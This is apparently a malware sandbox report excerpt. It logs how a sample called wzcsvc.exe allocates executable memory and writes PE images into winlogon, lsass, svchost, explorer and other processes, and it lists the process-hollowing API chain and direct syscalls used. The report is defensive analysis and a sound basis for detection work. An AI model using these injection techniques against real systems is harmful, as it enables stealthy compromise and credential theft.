Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18CE9170000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D959540000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18F1A9A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FF01350000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: 221D2530000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D400530000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\explorer.exe base: 8700000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27844DD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 258B00D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FA9A260000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1496A4A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 190043F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B8E5260000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 189090B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 212DAEE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 1EF4F460000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E594900000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18C88430000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18FE0970000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FDE2F60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2675A1B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Users\user\Desktop\r8k29DBraE.exe base: 2616F300000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Users\user\Desktop\wzcsapi.exe base: 1CE10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21681980000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\WerFault.exe base: 265B3BD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 13DE26F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BE3D690000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 25731DD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 19417AC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FE9F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FEA20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD1C80 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4B8F2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\dwm.exe EIP: F1EA2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 56A2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2542750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: EBF92750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F1602750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6A172750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 26992750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: AB962750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 9B2A2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 84182750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 78732750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5FCF2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 25D92750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A5D82750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F41C2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 25342750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FC902750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F3532750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 26282750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 31E62750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 137C2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 3A3B2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: E4192750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 1452750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 68FA2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 951C2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 63512750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4E122750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 98582750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 3C5C2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: CFCF2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 8E332750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: A2952750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 340C2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 53792750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 9A0E2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 30B32750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 35DA2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 792F2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: E9172750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 59542750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 1A9A2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 1352750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: D2532750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 532750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 8702750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 44DD2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: B00D2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 9A262750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: B71A2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 82022750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 706E2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 6A4A2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 43F2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 15D32750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: AD5E2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 570C2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: E5262750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 90B2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: B06E2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 9B7A2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: DAEE2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 4F462750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 94902750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 88432750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: E0972750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: E2F62750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 5A1B2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 6F302750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: unknown EIP: 1CE12750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 81982750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\WerFault.exe EIP: B3BD2750
Source: C:\Users\user\Desktop\wzcsvc.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E26F2750
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 3D692750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 31DD2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 17AC2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: FE9F2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: FEA22750Jump to behavior
Source: C:\Users\user\Desktop\wzcsvc.exe | NtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5E
Source: C:\Users\user\Desktop\wzcsvc.exe | NtProtectVirtualMemory: Direct from: 0x7FF6B5AD20DC
Source: C:\Users\user\Desktop\wzcsvc.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6B5AD164F
Source: C:\Users\user\Desktop\wzcsvc.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6B5AD140D
Source: C:\Users\user\Desktop\wzcsvc.exe | NtSetSecurityObject: Direct from: 0x7FF6B5AD23FC
Source: C:\Users\user\Desktop\wzcsvc.exe | NtMapViewOfSection: Direct from: 0x7FF6B5AD2023
Source: C:\Users\user\Desktop\wzcsvc.exe | NtFsControlFile: Direct from: 0x7FF6B5AD2200
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateKey: Direct from: 0x7FF6B5AD23BC
Source: C:\Users\user\Desktop\r8k29DBraE.exe | NtEnumerateValueKey: Indirect: 0x2616F592922
Source: C:\Users\user\Desktop\wzcsvc.exe | NtAdjustPrivilegesToken: Direct from: 0x7FF6B5AD2306
Source: C:\Users\user\Desktop\wzcsvc.exe | NtReadVirtualMemory: Direct from: 0x7FF6B5AD1FA6
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateThreadEx: Direct from: 0x7FF6B5AD2507
Source: C:\Users\user\Desktop\wzcsvc.exe | NtDelayExecution: Direct from: 0x7FF6B5AD2BEC
Source: C:\Users\user\Desktop\wzcsvc.exe | NtQuerySystemInformation: Direct from: 0x7FF6B5AD2B97
Source: C:\Users\user\Desktop\wzcsvc.exe | NtQueryInformationProcess: Direct from: 0x7FF6B5AD1215
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateNamedPipeFile: Direct from: 0x7FF6B5AD1C65
Source: C:\Users\user\Desktop\wzcsvc.exe | NtQuerySystemInformation: Direct from: 0x7FF6B5AD1555
Source: C:\Users\user\Desktop\wzcsvc.exe | NtClose: Direct from: 0x7FF6B5AD14AA
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateKey: Direct from: 0x7FF6B5AD243C
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateThreadEx: Direct from: 0x7FF6B5AD1454
Source: C:\Users\user\Desktop\wzcsvc.exe | NtQueryInformationProcess: Direct from: 0x7FF6B5AD1177
Source: C:\Users\user\Desktop\wzcsvc.exe | NtWriteVirtualMemory: Direct from: 0x7FF6B5AD1430
Source: C:\Users\user\Desktop\wzcsvc.exe | NtReadVirtualMemory: Direct from: 0x7FF6B5AD15A8
Source: C:\Users\user\Desktop\wzcsvc.exe | NtClose: Direct from: 0x7FF6B5AD18F9
Source: C:\Users\user\Desktop\wzcsvc.exe | NtClose: Direct from: 0x7FF6B5AD161B
Source: C:\Users\user\Desktop\wzcsvc.exe | NtReadFile: Direct from: 0x7FF6B5AD2C4B
Source: C:\Users\user\Desktop\wzcsvc.exe | NtFsControlFile: Direct from: 0x7FF6B5AD2C8F
Source: C:\Users\user\Desktop\r8k29DBraE.exe | NtEnumerateValueKey: Indirect: 0x2616F592951
Source: C:\Users\user\Desktop\wzcsvc.exe | NtProtectVirtualMemory: Direct from: 0x7FF6B5AD20AC
Source: C:\Users\user\Desktop\wzcsvc.exe | NtQueryInformationToken: Direct from: 0x7FF6B5AD2079
Source: C:\Users\user\Desktop\wzcsvc.exe | NtClose: Direct from: 0x7FF6B5AD2477
Source: C:\Users\user\Desktop\wzcsvc.exe | NtQueryInformationToken: Direct from: 0x7FF6B5AD22CE
Source: C:\Users\user\Desktop\wzcsvc.exe | NtAllocateVirtualMemory: Direct from: 0x23EB69F27F1
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateFile: Direct from: 0x7FF6B5AD1FD6
Source: C:\Users\user\Desktop\wzcsvc.exe | NtClose: Direct from: 0x7FF6B5AD2319
Source: C:\Users\user\Desktop\wzcsvc.exe | NtClose: Direct from: 0x7FF6B5AD20E5
Source: C:\Users\user\Desktop\wzcsvc.exe | NtReadVirtualMemory: Direct from: 0x7FF6B5AD15DF
Source: C:\Users\user\Desktop\wzcsvc.exe | NtSetValueKey: Direct from: 0x7FF6B5AD246D
Source: C:\Users\user\Desktop\wzcsvc.exe | NtProtectVirtualMemory: Direct from: 0x7FFB2CE826A1
Source: C:\Users\user\Desktop\wzcsvc.exe | NtQueryValueKey: Direct from: 0x7FF6B5AD232D
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateThreadEx: Direct from: 0x7FF6B5AD24A2
Source: C:\Users\user\Desktop\wzcsvc.exe | NtCreateThreadEx: Direct from: 0x7FF6B5AD24E6
Source: C:\Users\user\Desktop\wzcsvc.exe | NtFsControlFile: Direct from: 0x7FF6B5AD2C28
Source: C:\Users\user\Desktop\wzcsvc.exe | NtDelayExecution: Direct from: 0x7FF6B5AD250F
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\dwm.exe base: 262F1EA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18F1A9A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\explorer.exe base: 8700000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 212DAEE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\conhost.exe base: 1EF4F460000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E594900000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18C88430000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18FE0970000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FDE2F60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2675A1B0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Users\user\Desktop\r8k29DBraE.exe base: 2616F300000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1CE10000 value starts with: 4D5A
